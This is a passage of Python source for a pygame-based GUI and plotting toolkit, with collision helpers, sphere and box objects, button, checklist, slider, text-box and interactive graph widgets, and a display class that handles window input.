RemoveChild(self, name):\r\n        if name in self.childs:\r\n            del self.childs[name]\r\n\r\n    def __getitem__(self, index):\r\n        if index in self.vars:\r\n            return self.vars[index]\r\n        return None\r\n\r\nclass Collision:\r\n    @staticmethod\r\n    def PointAABB(point, aabb):\r\n        min = aabb.Get(\"min\")\r\n        max = aabb.Get(\"max\")\r\n        if (point[0] > min[0] and point[0] < max[0]):\r\n            if (point[1] > min[1] and point[1] < max[1]):\r\n                return True\r\n\r\n    @staticmethod\r\n    def PointRect(point, rect):\r\n        if point[0] > rect[0] and point[0] < rect[0] + rect[2]:\r\n            if point[1] > rect[1] and point[1] < rect[1] + rect[3]:\r\n                return True\r\n        return False\r\n\r\n    @staticmethod\r\n    def TwoAABB(aabb1, aabb2):\r\n        # two AABBs overlap iff their intervals overlap on both axes\r\n        
return (aabb1[\"min\"][0] <= aabb2[\"max\"][0] and aabb2[\"min\"][0] <= aabb1[\"max\"][0]\r\n                and aabb1[\"min\"][1] <= aabb2[\"max\"][1] and aabb2[\"min\"][1] <= aabb1[\"max\"][1])\r\n\r\n    @staticmethod\r\n    def PointSphere(point, sphere):\r\n        return np.linalg.norm(point-sphere.Get(\"center\")) <= sphere.Get(\"radius\")\r\n\r\n    @staticmethod\r\n    def TwoSphere(sphere1, sphere2):\r\n        if (not (sphere2[\"wire\"] or sphere1[\"wire\"])):\r\n            return [np.linalg.norm(sphere1[\"center\"]-sphere2.Get(\"center\")) < (sphere2.Get(\"radius\") + sphere1[\"radius\"]), (sphere1[\"center\"]+sphere2[\"center\"])/2.0, np.array([0, 0])]\r\n        elif ((not sphere1[\"wire\"]) and sphere2[\"wire\"]): # sphere 2 is a wire\r\n            c0 = sphere2[\"center\"]\r\n            c1 = sphere1[\"center\"]\r\n            dr = np.linalg.norm(c1-c0)\r\n            p = c0 + \\\r\n                (c1-c0) * ((sphere2[\"radius\"] -\r\n                            sphere1[\"radius\"]) / np.linalg.norm(c1-c0))\r\n            n = (c1-p) / np.linalg.norm(c1-p)\r\n            return [(sphere2[\"radius\"]-sphere1[\"radius\"] <= dr), p, n]\r\n        elif((not sphere2[\"wire\"])and sphere1[\"wire\"]):\r\n            return Collision.TwoSphere(sphere2, sphere1)\r\n\r\n    @staticmethod\r\n    def SphereAABB(sphere, aabb):\r\n        clamped = np.clip(sphere[\"center\"], aabb[\"min\"], aabb[\"max\"])\r\n        return [np.linalg.norm(clamped-sphere[\"center\"]) < sphere[\"radius\"], clamped]\r\n\r\n    @staticmethod\r\n    def LineSphere(v0, v1, sphere):\r\n        f = np.dot(v1-v0, sphere[\"center\"]-v0) / np.dot(v1-v0, v1-v0)\r\n        p = v0 + f*(v1-v0)\r\n        return [np.linalg.norm(sphere[\"center\"]-p) < sphere[\"radius\"], p]\r\n\r\n    @staticmethod\r\n    def ClipLine(d, v0, v1, aabb, f_l, f_h):\r\n        # start from the interval already clipped by previous dimensions\r\n        f_low = f_l\r\n        f_high = f_h\r\n\r\n        f_dim_low = (aabb[\"min\"][d]-v0[d])/(v1[d]-v0[d])\r\n        f_dim_high = (aabb[\"max\"][d]-v0[d])/(v1[d]-v0[d])\r\n\r\n        if (f_dim_high < f_dim_low):\r\n            f_dim_low, f_dim_high = f_dim_high, f_dim_low\r\n\r\n        if (f_dim_high < f_low):\r\n            return [False, f_low, f_high]\r\n\r\n        if (f_dim_low > f_high):\r\n            return [False, f_low, f_high]\r\n\r\n        f_low = max(f_dim_low, f_low)\r\n        f_high = min(f_dim_high, f_high)\r\n\r\n        if (f_low > f_high):\r\n            return [False, f_low, f_high]\r\n        return [True, f_low, f_high]\r\n\r\n    @staticmethod\r\n    def LineAABB(v0, v1, aabb):\r\n        f_low = 0.0\r\n        f_high = 1.0\r\n\r\n        [p, f_low, f_high] = Collision.ClipLine(0, v0, v1, aabb, f_low, f_high)\r\n        if (not p):\r\n            return [False]\r\n        [p, f_low, f_high] = Collision.ClipLine(1, v0, v1, aabb, f_low, f_high)\r\n        if (not p):\r\n            return [False]\r\n\r\n        b = v1-v0\r\n        return [True, v0 + b * f_low]\r\n\r\nclass Sphere(Object):\r\n    def __init__(self, center, radius, wire=False):\r\n        super().__init__()\r\n        self.Set(\"center\", center)\r\n        self.Set(\"radius\", radius)\r\n        self.Set(\"wire\", wire)\r\n\r\n    def SetCenter(self, center):\r\n        self.Set(\"center\", center)\r\n\r\n    def SetRadius(self, radius):\r\n        self.Set(\"radius\", radius)\r\n\r\nclass AABB(Object):\r\n\r\n    @staticmethod\r\n    def FromMinMax(min,max):\r\n        center = (min+max)/2.0\r\n        size = max-min\r\n        return AABB(center,size)\r\n\r\n    def __init__(self, center, size):\r\n        super().__init__()\r\n        self.Set(\"center\", np.array(center))\r\n        self.Set(\"size\", np.array(size))\r\n        self.Set(\"min\", self.Get(\"center\")-self.Get(\"size\")/2.0)\r\n        self.Set(\"max\", self.Get(\"center\")+self.Get(\"size\")/2.0)\r\n\r\n    def SetCenter(self, center):\r\n        self.Set(\"center\", np.array(center))\r\n        self.Set(\"min\", self.Get(\"center\")-self.Get(\"size\")/2.0)\r\n        self.Set(\"max\", self.Get(\"center\")+self.Get(\"size\")/2.0)\r\n\r\n    def SetSize(self, size):\r\n        self.Set(\"size\", size)\r\n        self.Set(\"min\", 
self.Get(\"center\")-self.Get(\"size\")/2.0)\r\n self.Set(\"max\", self.Get(\"center\")+self.Get(\"size\")/2.0)\r\n\r\nclass Button(Object):\r\n def __init__(self, string=\"None\", rect=[0, 0, 100, 10], func=None,name = \"\"):\r\n super().__init__()\r\n self.Set(\"string\", string)\r\n self.Set(\"rect\", rect)\r\n self.Set(\"func\", func)\r\n self.Set(\"back_colour\", (169, 169, 169))\r\n self.Set(\"name\",name)\r\n\r\n def Update(self, display):\r\n if (Collision.PointRect(display[\"input_mouse_down_pos\"], self.Get(\"rect\")) and display[\"input_button_down\"][1]):\r\n self.Set(\"back_colour\", (105, 105, 105))\r\n else:\r\n self.Set(\"back_colour\", (169, 169, 169))\r\n if Collision.PointRect(display[\"input_mouse_down_pos\"], self.Get(\"rect\")) and display[\"input_button_up\"][1]:\r\n if (Collision.PointRect(display[\"input_mouse_pos\"], self.Get(\"rect\"))):\r\n if (self.Get(\"func\") != None):\r\n self.Get(\"func\")(self)\r\n\r\n def Render(self, display):\r\n display.DrawText((255, 255, 255), self.Get(\"rect\")[0:2], self.Get(\r\n \"rect\")[3], self.Get(\"string\"), self.Get(\"back_colour\"))\r\n\r\nclass CheckList(Object):\r\n def __init__(self, items, pos=[10, 10], size=10, check=True,name = \"\"):\r\n super().__init__()\r\n self.Set(\"pos\", pos)\r\n self.Set(\"size\", size)\r\n self.Set(\"items\", items)\r\n self.Set(\"width\", max([len(x) for x in self.Get(\"items\")])*size)\r\n self.Set(\"height\", (len(self.Get(\"items\"))+1)*self.Get(\"size\"))\r\n self.Set(\"selected\", [])\r\n self.Set(\"check\", check)\r\n self.Set(\"callback\", None)\r\n self.Set(\"name\", name)\r\n\r\n def SetCallback(self, func):\r\n self.Set(\"callback\", func)\r\n\r\n def Update(self, display):\r\n pos = self.Get(\"pos\")\r\n width = self.Get(\"width\")\r\n height = self.Get(\"height\")\r\n if Collision.PointRect(display[\"input_mouse_down_pos\"], [pos[0], pos[1], width, height]) and display[\"input_button_tap\"][1]:\r\n s = Sphere([0, 0], 1)\r\n for i in range(len(self.Get(\"items\"))):\r\n s.SetCenter(np.array([pos[0] + int(5+self.Get(\"size\")/2), pos[1] + int(\r\n (self.Get(\"size\") * (i+1/2))+self.Get(\"size\")/2)]))\r\n s.SetRadius(int(self.Get(\"size\")/2 - 1))\r\n if (Collision.PointSphere(display[\"input_mouse_down_pos\"], s)):\r\n if self.Get(\"check\"):\r\n if i in self.Get(\"selected\"):\r\n self.Get(\"selected\").remove(i)\r\n else:\r\n self.Get(\"selected\").append(i)\r\n else:\r\n self.Set(\"selected\", [i])\r\n if self.Get(\"callback\") != None:\r\n self.Get(\"callback\")(self)\r\n\r\n def Render(self, display):\r\n width = self.Get(\"width\")\r\n height = (len(self.Get(\"items\"))+1)*self.Get(\"size\")\r\n surf = pygame.Surface([width, height])\r\n surf.fill((255, 255, 255))\r\n pygame.draw.line(surf, (0, 0, 0), (0, 0), (0, height-1))\r\n pygame.draw.line(surf, (0, 0, 0), (0, height-1), (width-1, height-1))\r\n pygame.draw.line(surf, (0, 0, 0), (width-1, height-1), (width-1, 0))\r\n pygame.draw.line(surf, (0, 0, 0), (0, 0), (width-1, 0))\r\n for i in range(len(self.Get(\"items\"))):\r\n item_y = self.Get(\"size\") * (i+1/2)\r\n if i in self.Get(\"selected\"):\r\n pygame.gfxdraw.filled_circle(surf, int(5+self.Get(\"size\")/2), int(\r\n item_y+self.Get(\"size\")/2), int(self.Get(\"size\")/2 - 1), (0, 0, 255))\r\n pygame.gfxdraw.aacircle(surf, int(5+self.Get(\"size\")/2), int(\r\n item_y+self.Get(\"size\")/2), int(self.Get(\"size\")/2 - 1), (0, 0, 0))\r\n display.DrawText((0, 0, 0), [\r\n width//3, item_y], int(self.Get(\"size\")), self.Get(\"items\")[i], None, surf)\r\n\r\n 
display[\"display\"].blit(surf, self.Get(\"pos\"))\r\n\r\nclass Slider(Object):\r\n def __init__(self, min, max, limits, label, step=0,name = \"\"):\r\n super().__init__()\r\n self.Set(\"min\", min)\r\n self.Set(\"max\", max)\r\n self.Set(\"limits\", limits)\r\n self.Set(\"step\",step)\r\n self.Set(\"label\", label)\r\n self.Set(\"value\", 0)\r\n self.Set(\"drag\", False)\r\n self.Set(\"callback\", None)\r\n self.Set(\"name\",name)\r\n\r\n def SetCallback(self, func):\r\n self.Set(\"callback\", func)\r\n \r\n def GetValue(self):\r\n val = self.Get(\"limits\")[0] + self.Get(\"value\") * (self.Get(\"limits\")[1]-self.Get(\"limits\")[0])\r\n if self.Get(\"step\") > 0:\r\n val = round(val/self.Get(\"step\"))*self.Get(\"step\")\r\n return val\r\n\r\n def Update(self, display):\r\n mi = np.array(self.Get(\"min\"))\r\n ma = np.array(self.Get(\"max\"))\r\n l1 = np.array(display[\"input_mouse_down_pos\"]) - mi\r\n l2 = ma - mi\r\n pos = self.Get(\"value\")* (ma-mi)+ mi\r\n s = Sphere(np.array(pos), 10)\r\n \r\n if (not self.Get(\"drag\")):\r\n if (Collision.PointSphere(np.array(display[\"input_mouse_down_pos\"]), s)) and display[\"input_button_down\"][1]:\r\n self.Set(\"drag\", True)\r\n else:\r\n f = np.dot(\r\n (ma-mi), (np.array(display[\"input_mouse_pos\"])-mi))/(np.linalg.norm(ma-mi)**2)\r\n f = max(0.0,min(f,1.0))\r\n if self.Get(\"callback\") != None:\r\n self.Get(\"callback\")(self)\r\n self.Set(\"value\", f)\r\n if (not display[\"input_button_down\"][1]):\r\n self.Set(\"drag\", False)\r\n c = 1/np.linalg.norm(l2) * np.power(np.power(np.linalg.norm(l1)*np.linalg.norm(l2),2) - np.power(np.dot(l1,l2),2),1/2)\r\n f = np.dot((ma-mi), (l1)/(np.linalg.norm(l2)**2))\r\n \r\n if Collision.PointAABB(l1+mi,AABB.FromMinMax(mi-np.array([10,10]),ma + np.array([10,10]))):\r\n step = 0\r\n if self.Get(\"step\") == 0:\r\n step = 0.001\r\n else:\r\n step = self.Get(\"step\")/(self.Get(\"limits\")[1]-self.Get(\"limits\")[0])\r\n step = display[\"input_scroll_delta\"]*step\r\n \r\n f = self.Get(\"value\") + step\r\n\r\n self.Set(\"value\", max(0.0,min(f,1.0)) )\r\n if display[\"input_scroll_delta\"] != 0:\r\n self.Get(\"callback\")(self)\r\n\r\n def Render(self, display):\r\n pygame.draw.aaline(display[\"display\"], (0, 0, 0),\r\n self.Get(\"min\"), self.Get(\"max\"))\r\n\r\n pygame.gfxdraw.filled_circle(display[\"display\"], self.Get(\r\n \"min\")[0], self.Get(\"min\")[1], 10, (255, 255, 255))\r\n pygame.gfxdraw.filled_circle(display[\"display\"], self.Get(\r\n \"max\")[0], self.Get(\"max\")[1], 10, (255, 255, 255))\r\n pygame.gfxdraw.aacircle(display[\"display\"], self.Get(\"min\")[\r\n 0], self.Get(\"min\")[1], 10, (0, 0, 0))\r\n pygame.gfxdraw.aacircle(display[\"display\"], self.Get(\"max\")[\r\n 0], self.Get(\"max\")[1], 10, (0, 0, 0))\r\n\r\n mi = np.array(self.Get(\"min\"))\r\n ma = np.array(self.Get(\"max\"))\r\n pos = (self.Get(\"value\") * (ma-mi)) + mi\r\n pygame.gfxdraw.filled_circle(display[\"display\"], int(\r\n pos[0]), int(pos[1]), 10, (0, 0, 255))\r\n pygame.gfxdraw.aacircle(display[\"display\"], int(\r\n pos[0]), int(pos[1]), 10, (0, 0, 0))\r\n display.DrawText((0, 0, 0), ((mi+ma)/2.0 + np.array([-len(self.Get(\"label\"))*1.5, -15])), 12, '{label} {value:.2f}'.format(label=self.Get(\"label\"), value=self.GetValue()))\r\n\r\nclass TextBox(Object):\r\n CHARS = 'qwertyuiopasdfghjklzxcvbnm/*-+#\\'[]'\r\n NUMBERS = '0123456789.'\r\n\r\n def __init__(self, initial_string=\"\", rect=[10, 10, 100, 10], border_colour=[128, 128, 128], back_colour=[255, 255, 255], limit_to_numbers=False, label = 
\"\",name = \"\"):\r\n super().__init__()\r\n self.Set(\"text\", initial_string)\r\n self.Set(\"rect\", rect)\r\n self.Set(\"border_colour\", border_colour)\r\n self.Set(\"back_colour\", back_colour)\r\n self.Set(\"limit_to_numbers\", limit_to_numbers)\r\n self.Set(\"is_float\", False)\r\n self.Set(\"start_type\", False)\r\n self.Set(\"callback\", None)\r\n self.Set(\"label\",label)\r\n self.Set(\"name\",name)\r\n\r\n def SetCallback(self, func):\r\n self.Set(\"callback\", func)\r\n\r\n def Update(self, display):\r\n if (Collision.PointRect(display[\"input_mouse_down_pos\"], self.Get(\"rect\")) and display[\"input_button_tap\"][1] and not self.Get(\"start_type\")):\r\n self.Set(\"start_type\", True)\r\n if (self.Get(\"start_type\")):\r\n chars = TextBox.NUMBERS\r\n input_chars = display[\"input_key_tap_dict\"]\r\n if (not self.Get(\"limit_to_numbers\")):\r\n chars += TextBox.CHARS\r\n for char in input_chars:\r\n if char in chars:\r\n if char == '.':\r\n if self.Get(\"is_float\") or len(self.Get(\"text\")) == 0:\r\n continue\r\n self.Set(\"is_float\", True)\r\n self.Set(\"text\", self.Get(\"text\")+str(char))\r\n if (display[\"input_key_tap\"][pygame.K_BACKSPACE]):\r\n if self.Get(\"text\").endswith('.'):\r\n self.Set(\"is_float\", False)\r\n self.Set(\"text\", self.Get(\"text\")[:-1])\r\n if (display[\"input_key_tap\"][pygame.K_RETURN] and self.Get(\"start_type\")):\r\n if (self.Get(\"callback\") != None):\r\n self.Get(\"callback\")(self)\r\n if (not Collision.PointRect(display[\"input_mouse_pos\"], self.Get(\"rect\")) and display[\"input_button_tap\"][1] and self.Get(\"start_type\")):\r\n if (self.Get(\"callback\") != None):\r\n self.Get(\"callback\")(self)\r\n self.Set(\"start_type\", False)\r\n\r\n def Render(self, display):\r\n surf = pygame.Surface(self.Get(\"rect\")[2:4])\r\n surf.fill(self.Get(\"border_colour\"))\r\n size = self.Get(\"rect\")[2:4]\r\n display.FilledRect(self.Get(\"back_colour\"), [\r\n size[0]//2, size[1]//2], [size[0]-2, size[1]-2], False, surf)\r\n render_text = self.Get(\"text\")\r\n display.DrawText((0, 0, 0, 255), [\r\n 0, size[1]//4], size[1]//2, render_text, None, surf)\r\n display.Get(\"display\").blit(surf, self.Get(\"rect\")[0:2])\r\n [pos_x, pos_y] = self.Get(\"rect\")[0:2]\r\n display.DrawText((0,0,0),[pos_x,pos_y-15],15,self.Get(\"label\"))\r\n\r\nclass Graph(Object):\r\n def __init__(self, rect=[10, 10, 100, 100], bounds=[0, 0, 0, 0],name = \"\"):\r\n super().__init__()\r\n self.Set(\"rect\", rect)\r\n self.Set(\"bounds\", bounds)\r\n self.Set(\"default_bounds\", bounds[:])\r\n self.Set(\"plots\", [])\r\n self.Set(\"screen_plots\", [])\r\n self.Set(\"surface\", pygame.Surface(rect[2:4]))\r\n self.Set(\"mouse_graph_pos\", [0, 0])\r\n self.Set(\"zoom_rect_start\", [0, 0])\r\n self.Set(\"zoom_rect_end\", [0, 0])\r\n self.Set(\"colour_list\",[(0,0,128),(0,128,0),(0,128,0),(128,0,0),(128,0,0)])\r\n self.Set(\"name\",name)\r\n self.Set(\"x_label\",None)\r\n self.Set(\"y_label\",None)\r\n self.Replot(bounds)\r\n\r\n def PlotToScreen(self, plot):\r\n screen_points = []\r\n for point in plot:\r\n x_new = (point[0]-self.Get(\"bounds\")[0])/(self.Get(\"bounds\")\r\n [1]-self.Get(\"bounds\")[0])*self.Get(\"rect\")[2]\r\n y_new = ((point[1]-self.Get(\"bounds\")[2])/(self.Get(\"bounds\")[3] -\r\n self.Get(\"bounds\")[2]))*(1-self.Get(\"rect\")[3])+(self.Get(\"rect\")[3]-1)\r\n screen_points.append([x_new, y_new])\r\n return screen_points\r\n\r\n def ScreenToPlot(self, screen, offset=True):\r\n plot_points = []\r\n for point in screen:\r\n x_new = 
((point[0]-self.Get(\"rect\")[0])/(self.Get(\"rect\")[2])\r\n )*(self.Get(\"bounds\")[1]-self.Get(\"bounds\")[0])\r\n y_new = ((point[1]-self.Get(\"rect\")[1])/(self.Get(\"rect\")[3])\r\n )*(self.Get(\"bounds\")[2]-self.Get(\"bounds\")[3])\r\n if offset:\r\n x_new = ((point[0]-self.Get(\"rect\")[0])/(self.Get(\"rect\")[2])\r\n )*(self.Get(\"bounds\")[1]-self.Get(\"bounds\")[0])\r\n y_new = ((point[1]-self.Get(\"rect\")[1])/(self.Get(\"rect\")[3])\r\n )*(self.Get(\"bounds\")[2]-self.Get(\"bounds\")[3])\r\n x_new += self.Get(\"bounds\")[0]\r\n y_new += self.Get(\"bounds\")[3]\r\n else:\r\n x_new = ((point[0])/(self.Get(\"rect\")[2])) * \\\r\n (self.Get(\"bounds\")[1]-self.Get(\"bounds\")[0])\r\n y_new = ((point[1])/(self.Get(\"rect\")[3])) * \\\r\n (self.Get(\"bounds\")[2]-self.Get(\"bounds\")[3])\r\n plot_points.append([x_new, y_new])\r\n return plot_points\r\n\r\n def Clear(self,resetBounds = True):\r\n self.Set(\"plots\", [])\r\n self.Set(\"screen_plots\", [])\r\n if resetBounds:\r\n self.Set(\"bounds\", [0, 0, 0, 0])\r\n self.Set(\"default_bounds\", [0, 0, 0, 0])\r\n\r\n surf = self.Get(\"surface\")\r\n surf.fill((255, 255, 255))\r\n pygame.draw.line(surf, (0, 0, 0), (0, self.Get(\"rect\")[3]), (0, 0))\r\n pygame.draw.line(surf, (0, 0, 0), (0, self.Get(\"rect\")[\r\n 3]-1), (self.Get(\"rect\")[2], self.Get(\"rect\")[3]-1))\r\n pygame.draw.line(surf, (0, 0, 0), (self.Get(\"rect\")[\r\n 2]-1, self.Get(\"rect\")[3]-1), (self.Get(\"rect\")[2]-1, 0))\r\n pygame.draw.line(surf, (0, 0, 0), (0, 0), (self.Get(\"rect\")[2], 0))\r\n\r\n def Plot(self, x_values, y_values, resize = True):\r\n if (len(x_values) == len(y_values)):\r\n points = [[x_values[i], y_values[i]]\r\n for i in range(0, len(x_values))]\r\n points = sorted(points,key = lambda l:l[0])\r\n x_min = min(min(x_values), self.Get(\"bounds\")[0])\r\n x_max = max(max(x_values), self.Get(\"bounds\")[1])\r\n y_min = min(min(y_values), self.Get(\"bounds\")[2])\r\n y_max = max(max(y_values), self.Get(\"bounds\")[3])\r\n if x_min == x_max:\r\n x_min -= 1\r\n x_max += 1\r\n if y_min == y_max:\r\n y_min -= 1\r\n y_max += 1\r\n if resize:\r\n self.Replot([x_min, x_max, y_min, y_max])\r\n self.Set(\"default_bounds\", [x_min, x_max, y_min, y_max])\r\n else:\r\n if len(self.Get(\"plots\")) == 0 and self.Get(\"default_bounds\") == [0,0,0,0]:\r\n self.Set(\"default_bounds\",[x_min,x_max,y_min,y_max])\r\n self.Replot([x_min,x_max,y_min,y_max])\r\n else:\r\n self.Replot(self.Get(\"bounds\"))\r\n colour = self.Get(\"colour_list\")[len(self.Get(\"plots\"))%len(self.Get(\"colour_list\"))]\r\n self.Get(\"plots\").append(points)\r\n pygame.draw.aalines(self.Get(\"surface\"),colour , False, self.PlotToScreen(points))\r\n \r\n def Replot(self,bounds):\r\n self.Set(\"bounds\",bounds)\r\n surf = self.Get(\"surface\")\r\n surf.fill((255, 255, 255))\r\n pygame.draw.line(surf, (0, 0, 0), (0, self.Get(\"rect\")[3]), (0, 0))\r\n pygame.draw.line(surf, (0, 0, 0), (0, self.Get(\"rect\")[\r\n 3]-1), (self.Get(\"rect\")[2], self.Get(\"rect\")[3]-1))\r\n pygame.draw.line(surf, (0, 0, 0), (self.Get(\"rect\")[\r\n 2]-1, self.Get(\"rect\")[3]-1), (self.Get(\"rect\")[2]-1, 0))\r\n pygame.draw.line(surf, (0, 0, 0), (0, 0), (self.Get(\"rect\")[2], 0))\r\n for i in range(len(self.Get(\"plots\"))):\r\n screen_plot = self.PlotToScreen(self.Get(\"plots\")[i])\r\n colour = self.Get(\"colour_list\")[i%len(self.Get(\"colour_list\"))]\r\n pygame.draw.aalines(surf, colour, False, screen_plot)\r\n\r\n\r\n def Update(self, display):\r\n if 
Collision.PointRect(display[\"input_mouse_down_pos\"], self.Get(\"rect\")) and display[\"input_button_down\"][1]:\r\n delta_pos = np.array(\r\n display[\"input_mouse_pos\"])-np.array(display[\"input_mouse_pos_old\"])\r\n delta_graph = self.ScreenToPlot([delta_pos], False)[0]\r\n x_min = self.Get(\"bounds\")[0] - delta_graph[0]\r\n x_max = self.Get(\"bounds\")[1] - delta_graph[0]\r\n y_min = self.Get(\"bounds\")[2] - delta_graph[1]\r\n y_max = self.Get(\"bounds\")[3] - delta_graph[1]\r\n self.Replot([x_min,x_max,y_min,y_max])\r\n if Collision.PointRect(display[\"input_mouse_down_pos\"], self.Get(\"rect\")):\r\n if display[\"input_key_tap\"][pygame.K_r]:\r\n self.Replot(self.Get(\"default_bounds\")[:])\r\n if display[\"input_scroll_delta\"] != 0:\r\n f = 1 - display[\"input_scroll_delta\"]/10.0\r\n p = self.ScreenToPlot([display[\"input_mouse_pos\"]])[0]\r\n x_min = p[0] + (self.Get(\"bounds\")[0]-p[0])*f\r\n x_max = p[0] + (self.Get(\"bounds\")[1]-p[0])*f\r\n y_min = p[1] + (self.Get(\"bounds\")[2]-p[1])*f\r\n y_max = p[1] + (self.Get(\"bounds\")[3]-p[1])*f\r\n self.Replot([x_min, x_max, y_min, y_max])\r\n if display[\"input_button_down\"][3]:\r\n self.Set(\"zoom_rect_start\", display[\"input_mouse_down_pos\"])\r\n self.Set(\"zoom_rect_end\", display[\"input_mouse_pos\"])\r\n if display[\"input_button_up\"][3]:\r\n g0 = self.ScreenToPlot([self.Get(\"zoom_rect_start\")], True)[0]\r\n g1 = self.ScreenToPlot([self.Get(\"zoom_rect_end\")], True)[0]\r\n self.Replot([min(g0[0], g1[0]),\r\n max(g0[0], g1[0]),\r\n min(g1[1], g0[1]),\r\n max(g1[1], g0[1])])\r\n\r\n if (Collision.PointRect(display[\"input_mouse_pos\"], self.Get(\"rect\"))):\r\n graph_pos = self.ScreenToPlot(\r\n [display[\"input_mouse_pos\"]], True)[0]\r\n self.Set(\"mouse_graph_pos\", graph_pos)\r\n\r\n def Render(self, display):\r\n surf = self.Get(\"surface\")\r\n [p_x, p_y] = self.Get(\"rect\")[0:2]\r\n display[\"display\"].blit(surf, self.Get(\"rect\")[0:2])\r\n display.DrawText((0, 0, 0), [\r\n p_x - 20, p_y], 11, '{0:1.2g}'.format(self.Get(\"bounds\")[3]), (255, 255, 255))\r\n display.DrawText((0, 0, 0), [p_x - 20, p_y+self.Get(\"rect\")[3]-10],\r\n 11, '{0:1.2g}'.format(self.Get(\"bounds\")[2]), (255, 255, 255))\r\n display.DrawText((0, 0, 0), [p_x, p_y+self.Get(\"rect\")[3]+5], 11,\r\n '{0:1.2g}'.format(self.Get(\"bounds\")[0]), (255, 255, 255))\r\n display.DrawText((0, 0, 0), [p_x+self.Get(\"rect\")[2]-5, p_y+self.Get(\"rect\")[\r\n 3]+5], 11, '{0:1.2g}'.format(self.Get(\"bounds\")[1]), (255, 255, 255))\r\n if (Collision.PointRect(display[\"input_mouse_pos\"], self.Get(\"rect\"))):\r\n display.DrawText((0, 0, 0), [display[\"size\"][0]//2, display[\"size\"][1]-20], 15,\r\n '(x = {0:1.2g}, y = {1:1.2g})'.format(self.Get(\"mouse_graph_pos\")[0], self.Get(\"mouse_graph_pos\")[1]))\r\n if (display[\"input_button_down\"][3]):\r\n g0 = self.Get(\"zoom_rect_start\")\r\n g1 = self.Get(\"zoom_rect_end\")\r\n pygame.gfxdraw.rectangle(display[\"display\"], [g0[0],\r\n g0[1],\r\n g1[0]-g0[0],\r\n g1[1]-g0[1]], (0, 0, 0))\r\n mi = np.array(self.Get(\"rect\")[0:2])\r\n ma = mi + np.array(self.Get(\"rect\")[2:4])\r\n center = (mi+ma)/2.0\r\n if self.Get(\"x_label\") != None: \r\n center[1] = ma[1]\r\n center[0] = center[0]-len(self.Get(\"x_label\"))*12\r\n display.DrawText((0,0,0),center,12,self.Get(\"x_label\"))\r\n if self.Get(\"y_label\") != None:\r\n center[0] = mi[0]-12\r\n center[1] = center[1]-len(self.Get(\"y_label\"))*12\r\n display.DrawText((0,0,0),center,12,self.Get(\"y_label\"),angle = 90.0)\r\n\r\nclass Display(Object):\r\n 
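\"\"\"Top-level pygame window: owns the display surface, per-frame input\r\n    state and the world-to-screen transform used by the drawing helpers.\r\n    \"\"\"\r\n\r\n    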
def __init__(self, width, height, title):\r\n super().__init__()\r\n self.Set(\"size\", np.array([width, height]))\r\n self.Set(\"isClosing\", 0)\r\n self.Set(\"bounds\", np.array([0, width, height, 0]))\r\n self.Set(\"clearColour\", (0, 0, 0))\r\n\r\n bounds = self.Get(\"bounds\")\r\n s_x = self.Get(\"size\")[0] / (bounds[1]-bounds[0])\r\n s_y = self.Get(\"size\")[1] / (bounds[2]-bounds[3])\r\n o_x = - (bounds[0]*self.Get(\"size\")[0]) / (bounds[1] - bounds[0])\r\n o_y = self.Get(\"size\")[\r\n 1] + ((bounds[2]*self.Get(\"size\")[1])/(bounds[3]-bounds[2]))\r\n self.Set(\"point_matrix\", np.array(\r\n [[s_x, 0, 0], [0, s_y, 0], [o_x, o_y, 1]]))\r\n self.Set(\"dist_matrix\", np.array([[s_x, 0], [0, s_y]]))\r\n\r\n os.environ[\"SDL_VIDEO_WINDOW_POS\"] = \"%d,%d\" % (100, 100)\r\n\r\n pygame.init()\r\n self.Set(\"display\", pygame.display.set_mode([width, height]))\r\n pygame.display.set_caption(title)\r\n\r\n pygame.font.init()\r\n self.Set(\"font\", pygame.font.Font(pygame.font.get_default_font(), 64))\r\n\r\n self.Set(\"timer_start\", 0)\r\n self.Set(\"timer_end\", pygame.time.get_ticks())\r\n self.Set(\"timer_delta\", 0.0)\r\n self.Set(\"timer_start\", self.Get(\"timer_end\"))\r\n\r\n self.Set(\"input_key_max\", 400)\r\n self.Set(\"input_key_down\", [False]*self.Get(\"input_key_max\"))\r\n self.Set(\"input_key_old\", [False]*self.Get(\"input_key_max\"))\r\n self.Set(\"input_key_tap\", [False]*self.Get(\"input_key_max\"))\r\n self.Set(\"input_key_tap_dict\", [])\r\n\r\n self.Set(\"input_button_max\", 10)\r\n self.Set(\"input_button_down\", [False]*self.Get(\"input_button_max\"))\r\n self.Set(\"input_button_old\", [False]*self.Get(\"input_button_max\"))\r\n self.Set(\"input_button_tap\", [False]*self.Get(\"input_button_max\"))\r\n self.Set(\"input_button_up\", [False]*self.Get(\"input_button_max\"))\r\n self.Set(\"input_scroll_pos\", 0)\r\n self.Set(\"input_scroll_pos_old\", 0)\r\n self.Set(\"input_scroll_delta\", 0)\r\n\r\n self.Set(\"input_mouse_down_pos\", [0, 0])\r\n self.Set(\"input_mouse_pos\", [0, 0])\r\n self.Set(\"input_mouse_pos_old\", [0, 0])\r\n\r\n def Update(self):\r\n self.Set(\"timer_end\", pygame.time.get_ticks())\r\n self.Set(\"timer_delta\", (self.Get(\"timer_end\") -\r\n self.Get(\"timer_start\"))/1000.0)\r\n if (self.Get(\"timer_delta\") > 1/60.0):\r\n self.Set(\"timer_delta\", 1/60.0)\r\n self.Set(\"timer_start\", self.Get(\"timer_end\"))\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.Set(\"isClosing\", 1)\r\n return\r\n elif event.type == pygame.KEYDOWN:\r\n self.Get(\"input_key_down\")[event.key] = True\r\n elif event.type == pygame.KEYUP:\r\n self.Get(\"input_key_down\")[event.key] = False\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if event.button == 4:\r\n self.Set(\"input_scroll_pos\",\r\n self.Get(\"input_scroll_pos\")+1)\r\n elif event.button == 5:\r\n self.Set(\"input_scroll_pos\",\r\n self.Get(\"input_scroll_pos\")-1)\r\n self.Get(\"input_button_down\")[event.button] = True\r\n self.Set(\"input_mouse_pos\", event.pos)\r\n self.Set(\"input_mouse_down_pos\", event.pos)\r\n elif event.type == pygame.MOUSEBUTTONUP:\r\n self.Get(\"input_button_down\")[event.button] = False\r\n self.Set(\"input_mouse_pos\", event.pos)\r\n elif event.type == pygame.MOUSEMOTION:\r\n self.Set(\"input_mouse_pos\", event.pos)\r\n\r\n self.UpdateAll(self)\r\n self.RenderAll(self)\r\n pygame.display.flip()\r\n self.Get(\"display\").fill(self.Get(\"clearColour\"))\r\n\r\n self.Set(\"input_key_tap_dict\", [])\r\n for i in range(0, 
